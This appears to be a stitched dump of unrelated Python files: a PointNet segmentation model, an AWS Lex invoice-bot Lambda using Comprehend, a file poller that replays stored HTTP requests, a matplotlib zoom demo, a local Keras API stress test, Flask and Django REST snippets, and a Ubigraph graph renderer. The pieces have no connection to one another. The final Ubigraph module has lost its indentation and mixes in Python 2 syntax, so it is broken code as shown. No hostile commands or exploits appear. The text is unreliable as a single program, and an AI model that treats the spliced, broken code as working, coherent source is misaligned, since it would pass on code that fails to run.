        return {torch.tensor} trans_matrix_2 : transform matrix learned by the second T-Net
        '''
        B, C, N = x.shape
        trans_matrix = self.tnet1(x)  # learned 3x3 input transform (T-Net with output_k=3)
        x = x.transpose(2, 1)  # [B, N, C]
        if C > 3:
            feature = x[:, :, 3:]  # feature [B, N, C-3]
            x = x[:, :, :3]  # coordinates [B, N, 3]
        x = torch.matmul(x, trans_matrix)  # align coordinates with the learned matrix, [B, N, 3]
        if C > 3:
            x = torch.cat([x, feature], dim=2)  # re-append the extra features, [B, N, C]
        x = x.transpose(2, 1)  # [B, C, N]
        local_feature_1 = self.conv1(x)  # [B, 64, N]
        local_feature_2 = self.conv2(local_feature_1)  # [B, 128, N]
        local_feature_3 = self.conv3(local_feature_2)  # [B, 128, N]
        trans_matrix_2 = self.tnet2(local_feature_3)  # [B, 128, 128]
        x = local_feature_3.transpose(2, 1)
        x = torch.matmul(x, trans_matrix_2)  # [B, N, 128]
        local_feature_4 = x.transpose(2, 1)  # [B, 128, N]
        local_feature_5 = self.conv4(local_feature_4)  # [B, 512, N]
        x = self.conv5(local_feature_5)  # [B, 2048, N]
        x = self.max_pool(x, dim=2)[0]  # symmetric max over points -> [B, 2048]
        global_feature = x.unsqueeze(2).repeat(1, 1, N)  # [B, 2048, N]
        one_hot_label = label.unsqueeze(2).repeat(1, 1, N)
        concat = torch.cat([local_feature_1, local_feature_2, local_feature_3,\
            local_feature_4, local_feature_5, global_feature, one_hot_label], dim=1)  # [B, 3024, N]
        output = self.classifier(concat)  # [B, 50, N]
        output = output.transpose(2, 1).contiguous()  # [B, N, 50]
        output = F.log_softmax(output, dim=-1)  # [B, N, 50]
        return output, trans_matrix_2
class PointNetSemanticSeg(nn.Module):
    """PointNet semantic segmentation: encoder (1088-channel per-point output) + per-point classifier."""

    def __init__(self, class_num, in_channel=9):
        super().__init__()
        self.class_num = class_num
        self.encoder = PointNetEncoder(global_feature=False, feature_transform=True, in_channel=in_channel)
        self.segment_net = nn.Sequential(
            TNetkd.get_single_conv(1088, 512, 1),
            TNetkd.get_single_conv(512, 256, 1),
            TNetkd.get_single_conv(256, 128, 1),
            nn.Conv1d(128, class_num, 1)
        )

    def forward(self, point_cloud):
        """Return (per-point class log-probabilities [B, N, class_num], second transform matrix)."""
        B, _, N = point_cloud.shape
        x, trans_matrix_1, trans_matrix_2 = self.encoder(point_cloud)
        x = self.segment_net(x)  # [B, class_num, N]
        x = x.transpose(2, 1).contiguous()  # [B, N, class_num]
        output = F.log_softmax(x, dim=-1)  # [B, N, class_num]
        return output, trans_matrix_2
class get_loss(nn.Module):
    """
    PointNet loss: NLL classification loss plus a regularization term on the
    learned feature-transform matrix; mat_diff_loss_scale is the weight
    applied to that regularization loss.
    """

    def __init__(self, mat_diff_loss_scale=0.001):
        super(get_loss, self).__init__()
        self.mat_diff_loss_scale = mat_diff_loss_scale

    def forward(self, pred, target, trans_feat, weight=None):
        if weight is None:
            loss = F.nll_loss(pred, target)
        else:
            loss = F.nll_loss(pred, target, weight=weight)  # class weights are needed for semantic segmentation
        mat_diff_loss = feature_transform_reguliarzer(trans_feat)  # regularizer loss L_reg for the transform matrix
        total_loss = loss + mat_diff_loss * self.mat_diff_loss_scale
        return total_loss
if __name__ == "__main__":
    # Part-segmentation smoke test (disabled):
    # model = PointNetPartSeg()
    # x = torch.rand((8, 6, 1000), dtype=torch.float)
    # label = torch.rand((8, 16), dtype=torch.float)
    # result, feat = model(x, label)
    # print(result.shape, feat.shape)

    # semantic seg: build a 20-class model and print its layer summary.
    model = PointNetSemanticSeg(20)
    x = torch.rand((8, 9, 1000), dtype=torch.float)
    # result, feat = model(x)
    # print(result.shape, feat.shape)
    summary(model, (9, 1000), device='cpu')
from typing import List
from app.models.experiment import ExperimentModel
from app.models.slate_config import SlateConfigModel
class SlateLineupExperimentModel(ExperimentModel):
    """
    Models a slate_lineup experiment
    """

    def __init__(self, experiment_id: str, description: str, rankers: List[str], slates: List[str],
                 weight: float = ExperimentModel.DEFAULT_WEIGHT):
        ExperimentModel.__init__(self, experiment_id, description, rankers, weight)
        # an experiment must target at least one slate
        if len(slates) == 0:
            raise ValueError('no slates provided for experiment')
        self.slates = slates

    @staticmethod
    def load_from_dict(experiment_dict: dict) -> 'SlateLineupExperimentModel':
        """
        Build a SlateLineupExperimentModel from a json-derived dictionary.

        :param experiment_dict: a dictionary derived from parsing json
        :return: a SlateLineupExperimentModel object
        """
        return SlateLineupExperimentModel(
            # generate an id for the experiment
            ExperimentModel.generate_experiment_id(experiment_dict),
            experiment_dict["description"],
            experiment_dict["rankers"],
            experiment_dict["slates"],
            # weight is optional and falls back to the model default
            experiment_dict.get('weight', ExperimentModel.DEFAULT_WEIGHT))

    @staticmethod
    def slate_id_exists(slate_id: str) -> bool:
        """
        Verify that the slate id exists

        :param slate_id: string id of a slate to be verified
        :return: boolean (pronounced like "jolene")
        """
        return slate_id in SlateConfigModel.SLATE_CONFIGS_BY_ID
|
##########################################################################
# Copyright 2017-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Amazon Software License (the "License"). You may not use this file
# except in compliance with the License. A copy of the License is located at
#
# http://aws.amazon.com/asl/
#
# or in the "license" file accompanying this file. This file is distributed on an "AS IS"
# BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, express or implied. See the
# License for the specific language governing permissions and limitations under the License.
##########################################################################
import json
import datetime
import time
import os
import dateutil.parser
import logging
import boto3
import tarfile
import csv
import re
from io import StringIO
from io import BytesIO
# Root logger for the Lambda; INFO and above is forwarded to CloudWatch.
logger = logging.getLogger()
logger.setLevel(logging.INFO)
# Shared AWS clients/resources, created once per Lambda container.
s3client = boto3.client('s3')
s3 = boto3.resource('s3')
comprehend = boto3.client('comprehend')
# Bucket holding the extracted invoice text; name comes from the environment.
bucket=os.environ['S3_BUCKET']
input_bucket = s3.Bucket(bucket)
# --- Helpers that build all of the responses ---
def elicit_slot(session_attributes, intent_name, slots, slot_to_elicit, message):
    """Build a Lex 'ElicitSlot' dialog-action response asking for one slot value."""
    dialog_action = {
        'type': 'ElicitSlot',
        'intentName': intent_name,
        'slots': slots,
        'slotToElicit': slot_to_elicit,
        'message': message,
    }
    return {'sessionAttributes': session_attributes, 'dialogAction': dialog_action}
def confirm_intent(session_attributes, intent_name, slots, message):
    """Build a Lex 'ConfirmIntent' dialog-action response."""
    dialog_action = {
        'type': 'ConfirmIntent',
        'intentName': intent_name,
        'slots': slots,
        'message': message,
    }
    return {'sessionAttributes': session_attributes, 'dialogAction': dialog_action}
def close(session_attributes, fulfillment_state, message):
    """Build a Lex 'Close' dialog-action response, ending the conversation."""
    dialog_action = {
        'type': 'Close',
        'fulfillmentState': fulfillment_state,
        'message': message,
    }
    return {'sessionAttributes': session_attributes, 'dialogAction': dialog_action}
def delegate(session_attributes, slots):
    """Build a Lex 'Delegate' dialog-action response (let Lex pick the next step)."""
    action = {'type': 'Delegate', 'slots': slots}
    return {'sessionAttributes': session_attributes, 'dialogAction': action}
# --- Helper Functions ---
def safe_int(n):
    """
    Safely convert n to int; None is passed through unchanged.
    """
    return n if n is None else int(n)
def try_ex(func):
    """
    Call passed in function in try block. If KeyError is encountered return None.
    This function is intended to be used to safely access dictionary.
    Note that this function would have negative impact on performance.

    Example: try_ex(lambda: intent['slots']['date']) -> value or None.
    """
    try:
        return func()
    except KeyError:
        return None
def build_validation_result(isvalid, violated_slot, message_content):
    """Assemble the slot-validation result structure used by the bot handlers."""
    message = {'contentType': 'PlainText', 'content': message_content}
    return {'isValid': isvalid, 'violatedSlot': violated_slot, 'message': message}
""" --- Functions that control the bot's behavior --- """
def get_summary(intent_request):
    """Fulfill the GetInvoiceSummary intent.

    Scans every text object in the input bucket, runs Comprehend entity
    detection on each, and accumulates an invoice count, the last seen
    invoice number and a quantity total, returned as a 'Close' response.
    """
    session_attributes = intent_request['sessionAttributes'] if intent_request['sessionAttributes'] is not None else {}
    i = 0
    qty = 0
    # BUG FIX: nr was previously unbound when the bucket was empty or no
    # matching entity was found, raising NameError at the format() below.
    nr = ''
    for file in input_bucket.objects.all():
        i += 1
        input_bucket_text_file = s3.Object(bucket, file.key)
        text_file_contents = str(input_bucket_text_file.get()['Body'].read().decode('utf-8'))
        # Comprehend Entity Detection
        detected_entities = comprehend.detect_entities(
            Text=text_file_contents,
            LanguageCode="en"
        )
        print(detected_entities)
        # The offsets assume the fixed layout of the extracted invoice text:
        # invoice number within the first 40 characters, invoice total between
        # offsets 337 and 350 -- TODO confirm against the input documents.
        for x in detected_entities['Entities']:
            if x['Type'] == "OTHER" and x['EndOffset'] < 40:
                nr = x['Text']
            if x['Type'] == "QUANTITY" and x['EndOffset'] > 337 and x['EndOffset'] <= 350:
                qty = round((qty + float(x['Text'])), 2)
    return close(
        session_attributes,
        'Fulfilled',
        {
            'contentType': 'PlainText',
            'content': 'I reviewed your input documents and found {} invoices with invoice numbers {} totaling ${}. I can get you invoice details or invoice notes. Simply type your request'.format(i, nr, str(qty))
        }
    )
def get_details(intent_request):
    """Fulfill the GetInvoiceDetails intent.

    Looks for the invoice whose number matches the 'invoicenr' slot and
    responds with its date/item/charge details; otherwise responds with a
    not-found message.
    """
    session_attributes = intent_request['sessionAttributes'] if intent_request['sessionAttributes'] is not None else {}
    inr = intent_request['currentIntent']['slots']['invoicenr']
    result = ""
    r = 0
    for file in input_bucket.objects.all():
        input_bucket_text_file = s3.Object(bucket, file.key)
        text_file_contents = str(input_bucket_text_file.get()['Body'].read().decode('utf-8'))
        # Comprehend Entity Detection
        detected_entities = comprehend.detect_entities(
            Text=text_file_contents,
            LanguageCode="en"
        )
        print(detected_entities)
        selected_entity_types = ["DATE", "QUANTITY"]
        # Extract this document's invoice number (an OTHER entity).
        # BUG FIX: detnr could previously be unbound if no OTHER entity was
        # detected, and a later non-matching file clobbered an already-found
        # result with the not-found message.
        detnr = None
        for x in detected_entities['Entities']:
            if x['Type'] == "OTHER":
                detnr = x['Text']
        if detnr == inr:
            htmlstring = "Invoice Details for " + detnr + ": "
            # Details occupy offsets (40, 337] and repeat as
            # date / item / charge triples -- TODO confirm layout.
            for x in detected_entities['Entities']:
                if x['Type'] in selected_entity_types and x['EndOffset'] > 40 and x['EndOffset'] <= 337:
                    r += 1
                    if r == 1:
                        htmlstring += "On " + x['Text'] + " "
                    elif r == 2:
                        htmlstring += "for the item " + x['Text'] + " "
                    else:
                        htmlstring += " there is a charge of " + str(x['Text'].split()[0]) + ". "
                        r = 0
            print("HTMLString is: " + htmlstring)
            result = htmlstring + " You can request me for invoice notes or simply close this chat."
    if not result:
        result = 'Sorry I could not find a match for that Invoice Number. Please request for invoice details with a valid Invoice Number.'
    return close(
        session_attributes,
        'Fulfilled',
        {
            'contentType': 'PlainText',
            'content': result
        }
    )
def get_notes(intent_request):
    """Fulfill the GetInvoiceNotes intent.

    Finds the invoice matching the 'invoicenr' slot and responds with the key
    phrases Comprehend detects in its notes section; otherwise responds with a
    not-found message.
    """
    session_attributes = intent_request['sessionAttributes'] if intent_request['sessionAttributes'] is not None else {}
    inr = intent_request['currentIntent']['slots']['invoicenr']
    # BUG FIX: result was previously unbound (NameError) when the bucket was
    # empty or no document matched; default to the not-found message instead.
    result = 'Sorry I could not find a match for that Invoice Number. Please request for invoice notes with a valid Invoice Number'
    for file in input_bucket.objects.all():
        input_bucket_text_file = s3.Object(bucket, file.key)
        text_file_contents = str(input_bucket_text_file.get()['Body'].read().decode('utf-8'))
        detected_entities = comprehend.detect_entities(
            Text=text_file_contents,
            LanguageCode="en"
        )
        # Extract this document's invoice number (an OTHER entity).
        detnr = None
        for x in detected_entities['Entities']:
            if x['Type'] == "OTHER":
                detnr = x['Text']
        if detnr == inr:
            # Comprehend Key Phrases Detection
            detected_key_phrases = comprehend.detect_key_phrases(
                Text=text_file_contents,
                LanguageCode="en"
            )
            print(detected_key_phrases)
            # Notes occupy offsets (185, 337] of the extracted text -- TODO
            # confirm against the input document layout.
            selected_phrases = ""
            for y in detected_key_phrases['KeyPhrases']:
                if y['EndOffset'] > 185 and y['EndOffset'] <= 337:
                    selected_phrases = " " + y['Text'] + selected_phrases + " "
            print("Selected Phrases are: " + selected_phrases)
            result = "Invoice Notes for " + detnr + ": " + selected_phrases
    return close(
        session_attributes,
        'Fulfilled',
        {
            'contentType': 'PlainText',
            'content': result + '. Feel free to try the options again or you can simply close this chat'
        }
    )
def dispatch(intent_request):
    """
    Called when the user specifies an intent for this bot: routes the event
    to the matching intent handler.
    """
    print("Intent Request is: " + str(intent_request))
    logger.debug('dispatch userId={}, intentName={}'.format(intent_request['userId'], intent_request['currentIntent']['name']))

    intent_name = intent_request['currentIntent']['name']

    # Dispatch to your bot's intent handlers via a lookup table.
    handlers = {
        'GetInvoiceSummary': get_summary,
        'GetInvoiceDetails': get_details,
        'GetInvoiceNotes': get_notes,
    }
    handler = handlers.get(intent_name)
    if handler is None:
        raise Exception('Intent with name ' + intent_name + ' not supported')
    return handler(intent_request)
# --- Main handler ---
def lambda_handler(event, context):
    """
    Route the incoming request based on intent.
    The JSON body of the request is provided in the event slot.
    """
    # `context` is unused; it is required by the AWS Lambda handler signature.
    logger.debug('event.bot.name={}'.format(event['bot']['name']))
    return dispatch(event)
#!/usr/bin/env python
# Standard library imports
import argparse
import collections
import logging
import os
import time
# Additional library imports
import requests
# Named logger for this module
_logger = logging.getLogger(__name__)
# Parse the command line arguments
_parser = argparse.ArgumentParser('')
_parser.add_argument('-t', '--triggers', default='triggers', help='Folder containing trigger files')
# BUG FIX: type=float is required here. Without it a rate supplied on the
# command line arrives as a str (only the default was a float), and the
# later `1.0 / _args.rate` raises TypeError.
_parser.add_argument('-r', '--rate', default=4.0, type=float, help='Poll rate in polls per second')
_parser.add_argument('-d', '--debug', action='store_true', help='Enables debug logging')
_args = _parser.parse_args()

# Configure the logging module
_logformat = '%(asctime)s : %(levelname)s : %(name)s : %(message)s'
_loglevel = logging.DEBUG if _args.debug else logging.INFO
logging.basicConfig(format=_logformat, level=_loglevel)
logging.getLogger('requests.packages.urllib3').setLevel(logging.WARNING)

# We use a session variable so that HTTP keep-alive is utilized, and
# also so we'll always remember to set the content type appropriately.
_session = requests.session()
_session.headers['Content-Type'] = 'application/json'

# Stores previous last access times for each file
# so they can be compared each time files are polled.
_atimes = collections.defaultdict(time.time)

# Poll the list of files forever
while True:
    # Delay the appropriate amount of time between polls
    time.sleep(1.0 / _args.rate)

    # Grab a list of all fully-qualified wave file names in the trigger folder
    files = (os.path.join(_args.triggers, f) for f in os.listdir(_args.triggers) if os.path.splitext(f)[1] == '.wav')

    # Iterate over the list of files
    for filename in files:
        # If the last access time is newer than what was previously recorded then take
        # action on that file. A small threshold is used to prevent "double bouncing".
        if os.stat(filename).st_atime - _atimes[filename] > 1.0:
            # Open the file and pull out the data
            with open(filename, 'rb') as f:
                req = f.read()

            # Immediately store off the last accessed time
            _atimes[filename] = os.stat(filename).st_atime

            # Separate the components of the request. The 52-byte skip jumps
            # over a fixed-size header to the embedded request payload --
            # TODO confirm against the trigger-file format.
            method, url, data = req[52:].splitlines(False)

            # Attempt to send the request and log the results
            _logger.debug('Sending {0} request to {1}'.format(method, url))
            try:
                response = _session.request(method, url, data=data)
                _logger.debug('Received response with status code {0}'.format(response.status_code))
            except requests.RequestException:
                _logger.warning('Unable to contact {0}'.format(url))
|
from .stgcn import STConv, TemporalConv
from .astgcn import ASTGCN, ChebConvAttention
from .mstgcn import MSTGCN
from .gman import GMAN, SpatioTemporalEmbedding, SpatioTemporalAttention
from .mtgnn import MTGNN, MixProp, GraphConstructor
from .tsagcn import GraphAAGCN, AAGCN
from .dnntsp import DNNTSP
|
"""
This example shows how to connect events in one window, for example, a mouse
press, to another figure window.
If you click on a point in the first window, the x and y limits of the
second will be adjusted so that the center of the zoom in the second
window will be the x,y coordinates of the clicked point.
Note the diameter of the circles in the scatter are defined in
points**2, so their size is independent of the zoom
"""
from matplotlib.pyplot import figure, show
import numpy

# Source figure (click here) and the zoom figure whose limits track the click.
figsrc = figure()
figzoom = figure()

axsrc = figsrc.add_subplot(111, xlim=(0,1), ylim=(0,1), autoscale_on=False)
axzoom = figzoom.add_subplot(111, xlim=(0.45,0.55), ylim=(0.4,.6),
    autoscale_on=False)
axsrc.set_title('Click to zoom')
axzoom.set_title('zoom window')

# Random scatter data shared by both axes; sizes are in points**2, so the
# marker size is independent of the zoom level.
x,y,s,c = numpy.random.rand(4,200)
s *= 200
axsrc.scatter(x,y,s,c)
axzoom.scatter(x,y,s,c)

def onpress(event):
    # Only react to left mouse button presses.
    if event.button!=1: return
    # Center a fixed-size 0.2 x 0.2 window on the clicked data coordinates.
    x,y = event.xdata, event.ydata
    axzoom.set_xlim(x-0.1, x+0.1)
    axzoom.set_ylim(y-0.1, y+0.1)
    figzoom.canvas.draw()

figsrc.canvas.mpl_connect('button_press_event', onpress)
show()
|
# USAGE
# python stress_test.py
# import the necessary packages
from threading import Thread
import requests
import time
import cv2
import base64
# initialize the Keras REST API endpoint URL along with the input
# image path
KERAS_REST_API_URL = "https://127.0.0.1/dododo/"
IMAGE_PATH = "jemma.png"

# initialize the number of requests for the stress test along with
# the sleep amount between requests
NUM_REQUESTS = 500
SLEEP_COUNT = 0.05

def call_predict_endpoint(n):
    # load the input image and construct the payload for the request
    #image = open(IMAGE_PATH, "rb").read()
    image_np=cv2.imread(IMAGE_PATH)
    image = cv2.imencode('.jpg', image_np)[1]
    # str() of bytes looks like "b'...'"; [2:-1] strips the b'' wrapper to
    # leave the bare base64 text
    image_code = str(base64.b64encode(image))[2:-1]
    payload = {"image": image_code}

    # submit the request. NOTE(review): verify=False disables TLS certificate
    # checking -- acceptable for a local test endpoint only.
    r = requests.post(KERAS_REST_API_URL, data=payload,verify=False).json()

    # ensure the request was successful
    if r["success"]:
        print("[INFO] thread {} OK".format(n))

    # otherwise, the request failed
    else:
        print("[INFO] thread {} FAILED".format(n))

# loop over the number of threads
for i in range(0, NUM_REQUESTS):
    # start a new thread to call the API
    t = Thread(target=call_predict_endpoint, args=(i,))
    t.daemon = True
    t.start()
    time.sleep(SLEEP_COUNT)

# insert a long sleep so we can wait until the server is finished
# processing the images
time.sleep(300)
from ..schemas import CategoryBaseSchema, CategorySchema, CategoryUpdateSchema
from ...forum.models import Category
from app.core.exceptions import ValidationError
class CategoryManager():
    """Service layer for forum Category CRUD, wrapping the model with
    marshmallow schema (de)serialization."""

    def __init__(self):
        self.category_create_schema = CategoryBaseSchema()
        self.category_update_schema = CategoryUpdateSchema()
        self.category_list_schema = CategorySchema(many=True)
        self.category_schema = CategorySchema()

    def _require_category(self, category_id):
        """Return the Category with the given id, or raise ValidationError."""
        found = Category.query.filter_by(id=category_id).first()
        if not found:
            raise ValidationError('Category', 'Category not found')
        return found

    def get_all_categories(self):
        """Serialized list of all categories, ordered by position."""
        ordered = Category.query.order_by(Category.position.asc()).all()
        return self.category_list_schema.dump(ordered)

    def get_category(self, category_id):
        """Serialized single category by id (empty dump when not found)."""
        match = Category.query.filter_by(id=category_id).first()
        return self.category_schema.dump(match)

    def add_category(self, category_data):
        """Validate and persist a new category."""
        return self.save(self.category_create_schema.load(category_data))

    def update_category(self, category_data):
        """Validate the id exists, then persist the updated data."""
        self._require_category(category_data['id'])
        return self.save(self.category_update_schema.load(category_data))

    def delete_category(self, category_id):
        """Delete the category with the given id (raises when missing)."""
        self._require_category(category_id).delete()

    def save(self, category_data):
        """Create a Category from validated data and save it."""
        return Category(**category_data).save()
|
from flask import Flask, abort, make_response, request, jsonify
from flask_restful import Resource, Api
import yaml
import logging
from logging.handlers import RotatingFileHandler
from src.vec_similarity import vec_search
from src.utils.logger import init_logging
# Flask application and its REST extension; logging handlers come from
# src.utils.logger.
app = Flask(__name__)
api = Api(app)
init_logging()
@app.route('/')
def hello_world():
    # Simple landing/liveness page.
    return 'Hello World'
@app.route('/ping')
def ping():
    # Health-check endpoint; always reports code 200.
    return jsonify({ "code": "200", "message": "" })
@app.route('/search', methods=['POST', 'GET'])
def search():
    # Log the raw JSON body, then delegate to the vector-similarity search.
    logging.info('search request json:{}'.format(request.json))
    return vec_search()
if __name__ == '__main__':
    # BUG FIX: yaml.load('conf/config.yaml') parsed the literal path string
    # rather than the file's contents (and the Loader-less yaml.load form is
    # deprecated/unsafe). Read the file and use safe_load instead.
    with open('conf/config.yaml') as f:
        conf = yaml.safe_load(f)
    app.run()
from rest_framework import serializers
from .models import PurchaseOrder, PurchaseOrderLine
class PurchaseOrderSerializer(serializers.HyperlinkedModelSerializer):
    """REST serializer for PurchaseOrder, exposing its lines as hyperlinks."""

    # Read-only reverse relation: links to each line on this purchase order.
    purchase_order_lines = serializers.HyperlinkedRelatedField(
        many=True, read_only=True, view_name="purchaseorderline-detail"
    )

    class Meta:
        model = PurchaseOrder
        fields = [
            "url",
            "id",
            "supplier",
            "due_by",
            "received_on",
            "complete",
            "value",
            "received_value",
            "purchase_order_lines",
        ]
class PurchaseOrderLineSerializer(serializers.HyperlinkedModelSerializer):
    """REST serializer for a single PurchaseOrderLine."""

    class Meta:
        model = PurchaseOrderLine
        # These are derived/maintained server-side and must not be set by clients.
        read_only_fields = ["complete_date", "value"]
        fields = [
            "url",
            "id",
            "purchase_order",
            "product",
            "quantity",
            "received_quantity",
            "created_date",
            "complete",
            "complete_date",
            "value",
            "received_value",
        ]
|
"""
The ``zen.drawing.ubigraph`` module provides support for rendering Zen graphs in the `Ubigraph visualization environment <http://ubietylab.net/ubigraph/>`_. The renderer will update the visualization in real time as changes are made to the underlying graph. Furthermore, edges and nodes can be visually highlighted.
The functionality of this module falls into two areas: rendering the topology of the graph and highlighting nodes and edges. All this functionality is
available through the :py:class:`zen.UbigraphRenderer` class.
Rendering a graph
=================
In order to render a graph, first construct the `UbigraphRenderer` and connect it to an Ubigraph server.
A simple use case involving a connection to a local Ubigraph server would look something like::
G = DiGraph()
ur = UbigraphRenderer('http://localhost:20738/RPC2')
ur.default_node_color = '#00ff00' # all nodes will be green
ur.graph = G
G.add_edge(1,2)
G.add_edge(2,3)
In this example, the graph is empty at first. Because the renderer registers as a graph event listener, the Ubigraph view
will be updated as nodes and edges are added.
Note that it is possible to change the way that nodes and edges will be rendered by default. Currently the following attributes
are supported:
* ``default_node_color``
* ``default_node_shape``
* ``default_edge_color``
* ``default_edge_width``
All these attributes assume values dictated by the `Ubigraph API <http://ubietylab.net/ubigraph/content/Docs/index.html>`_. Both undirected and directed graphs are
supported. Directed graphs will be rendered with directed edges - everything else is the same.
Node/Edge Highlighting
======================
Nodes and edges can be highlighted using the methods :py:meth:`zen.UbigraphRenderer.highlight_nodes`/:py:meth:`zen.UbigraphRenderer.highlight_nodes_` and :py:meth:`zen.UbigraphRenderer.highlight_edges`/:py:meth:`zen.UbigraphRenderer.highlight_edges_`. As always, the underscore allows use of either node/edge indices (with the underscore) or node/edge objects (without the underscore).
The UbigraphRenderer class
==========================
.. autoclass:: zen.UbigraphRenderer()
"""
import logging
import time
import xmlrpclib
from zen.graph import Graph
from zen.digraph import DiGraph
logger = logging.getLogger(__name__)
class UbigraphRenderer(object):
"""
The UbigraphRenderer is constructed with a URL to the Ubigraph server it will connect to. Following this, the graph can be set using the ``.graph`` attribute.
"""
def __init__(self,url,**kwargs):
    """
    Create an UbigraphRenderer instance that will render graph events to the server indicated in ``url``.

    **Keyword Args**:

      * ``graph [=None]`` (:py:class:`Graph` or :py:class:`DiGraph`): the graph that will be rendered. This can also be set using
        the ``UbigraphRenderer.graph`` property.
      * ``event_delay [=0]`` (float): the number of seconds that each event update call should wait. This is one way of
        making the graph render more slowly. Of course, this also slows down the graph construction code itself. Use with care.
    """
    graph = kwargs.pop('graph',None)
    self._event_delay = kwargs.pop('event_delay',0)

    # Reject any unrecognized keyword arguments.
    # NOTE(review): Python 2 raise syntax; also ZenException is not imported
    # in this module, so this line would itself raise NameError -- verify.
    if len(kwargs) > 0:
        raise ZenException, 'Unexpected remaining arguments: %s' % kwargs.keys()

    logger.debug('connecting to ubigraph server: %s' % url)
    self.server = xmlrpclib.Server(url)
    self.server_graph = self.server.ubigraph

    # Highlight styles are derived from the server's default style (style 0).
    self.highlighted_node_style = self.server_graph.new_vertex_style(0)
    self.highlighted_edge_style = self.server_graph.new_edge_style(0)

    # Default and highlight appearance values (Ubigraph API attribute values);
    # the assignments go through the corresponding properties, which push the
    # values to the server.
    self.default_node_color = '#0000bb'
    self.default_node_shape = 'sphere'
    self.default_edge_color = '#ffffff'
    self.default_edge_width = '1.0'
    self.highlighted_node_color = '#bb0000'
    self.highlighted_node_shape = 'sphere'
    self.highlighted_edge_color = '#ffff00'
    self.highlighted_edge_width = '6.0'

    # now that everything is setup, if a graph was provided, apply it!
    self.graph = graph
def __graph(self,graph=None):
if graph is None:
return self._graph
else:
self.server_graph.clear()
####
# reapply defaults to the server
# set the default styles
self.default_node_color = self._default_node_color
self.default_node_shape = self._default_node_shape
self.default_edge_color = self._default_edge_color
self.default_edge_width = self._default_edge_width
if type(graph) == DiGraph:
self.server_graph.set_edge_style_attribute(0, 'arrow', 'true')
# create and set the highlighted styles
self.highlighted_node_style = self.server_graph.new_vertex_style(0)
self.highlighted_edge_style = self.server_graph.new_edge_style(0)
self.highlighted_node_color = self._hlight_node_color
self.highlighted_node_shape = self._hlight_node_shape
self.highlighted_edge_color = self._hlight_edge_color
self.highlighted_edge_width = self._hlight_edge_width
# zero out highlighted anything
self._highlighted_edges = set()
self._highlighted_nodes = set()
####
# initialize graph stuff
self._graph = graph
self.node_map = {}
self.edge_map = {}
self._graph.add_listener(self)
#####
# build up the graph as it currently exists
# briefly suspend the event delay
actual_event_delay = self._event_delay
self._event_delay = 0
for nidx,nobj,data in self._graph.nodes_iter_(obj=True,data=True):
self.node_added(nidx,nobj,data)
for eidx,data,weight in self._graph.edges_iter_(data=True,weight=True):
uidx,vidx = self._graph.endpoints_(eidx)
self.edge_added(eidx,uidx,vidx,data,weight)
# put the event delay back in place
self._event_delay = actual_event_delay
graph = property( __graph, __graph)
def __inner_default_node_color(self,color=None):
"""
If a color is given, the default node color is changed. Otherwise, the default color is returned.
"""
if color is not None:
self.server_graph.set_vertex_style_attribute(0, 'color', color)
self._default_node_color = color
else:
return self._default_node_color
def __inner_default_node_shape(self,shape=None):
"""
If a shape is given, the default node shape is changed. Otherwise, the default shape is returned.
"""
logger.debug('entering inner default node shape with %s' % shape)
if shape is not None:
self.server_graph.set_vertex_style_attribute(0, 'shape', shape)
self._default_node_shape = shape
else:
return self._default_node_shape
def __inner_default_edge_color(self,color=None):
"""
If a shape is given, the default edge color is changed. Otherwise, the default color is returned.
"""
if color is not None:
self.server_graph.set_edge_style_attribute(0, 'color', color)
self._default_edge_color = color
else:
return self._default_edge_color
def __inner_default_edge_width(self,width=None):
"""
If a width (string) is given, the default edge width is changed. Otherwise, the default width is returned.
"""
if width is not None:
self.server_graph.set_edge_style_attribute(0, 'width', width)
self._default_edge_width = width
else:
return self._default_edge_width
default_node_color = property(__inner_default_node_color, __inner_default_node_color)
default_node_shape = property(__inner_default_node_shape, __inner_default_node_shape)
default_edge_color = property(__inner_default_edge_color, __inner_default_edge_color)
default_edge_width = property(__inner_default_edge_width, __inner_default_edge_width)
def __inner_hlight_node_color(self,color=None):
"""
If a color is given, the highlighted node color is changed. Otherwise, the highlighted color is returned.
"""
if color is not None:
self.server_graph.set_vertex_style_attribute(self.highlighted_node_style, 'color', color)
self._hlight_node_color = color
else:
return self._hlight_node_color
def __inner_hlight_node_shape(self,shape=None):
"""
If a shape is given, the hlight node shape is changed. Otherwise, the hlight shape is returned.
"""
logger.debug('entering inner hlight node shape with %s' % shape)
if shape is not None:
self.server_graph.set_vertex_style_attribute(self.highlighted_node_style, 'shape', shape)
self._hlight_node_shape = shape
else:
return self._hlight_node_shape
def __inner_hlight_edge_color(self,color=None):
"""
If a shape is given, the hlight edge color is changed. Otherwise, the hlight color is returned.
"""
if color is not None:
self.server_graph.set_edge_style_attribute(self.highlighted_edge_style, 'color', color)
self._hlight_edge_color = color
else:
return self._hlight_edge_color
def __inner_hlight_edge_width(self,width=None):
"""
If a width (string) is given, the hlight edge width is changed. Otherwise, the hlight width is returned.
"""
if width is not None:
self.server_graph.set_edge_style_attribute(self.highlighted_edge_style, 'width', width)
self._hlight_edge_width = width
else:
return self._hlight_edge_width
highlighted_node_color = property(__inner_hlight_node_color, __inner_hlight_node_color)
highlighted_node_shape = property(__inner_hlight_node_shape, __inner_hlight_node_shape)
highlighted_edge_color = property(__inner_hlight_edge_color, __inner_hlight_edge_color)
highlighted_edge_width = property(__inner_hlight_edge_width, __inner_hlight_edge_width)
def node_added(self,nidx,nobj,data):
# skip nodes that have already been seen
if nidx in self.node_map:
logger.warn('node %d cannot be added. A mapping already exists.' % nidx)
return
logger.debug('registering node %d with the server' % nidx)
self.node_map[nidx] = self.server_graph.new_vertex()
self.server_graph.set_vertex
time.sleep(self._event_delay)
return
def node_removed(self,nidx,nobj):
if nidx in self.node_map:
logger.debug('removing node %d from the server.' % nidx)
self.server_graph.remove_vertex(self.node_map[nidx])
del self.node_map[nidx]
time.sleep(self._event_delay)
else:
logger.warn('node %d cannot be removed. No mapping exists.' % nidx)
def edge_added(self,eidx,uidx,vidx,data,weight):
# skip nodes that have already been seen
if eidx in self.edge_map:
logger.warn('edge %d cannot be added. A mapping already exists.' % eidx)
return
logger.debug('registering edge %d with the server' % eidx)
self.edge_map[eidx] = self.server_graph.new_edge(self.node_map[uidx],self.node_map[vidx])
time.sleep(self._event_delay)
return
def edge_removed(self,eidx,uidx,vidx):
if eidx in self.edge_map:
logger.debug('removing edge %d from the server.' % eidx)
self.server_graph.remove_edge(self.edge_map[eidx])
del self.edge_map[eidx]
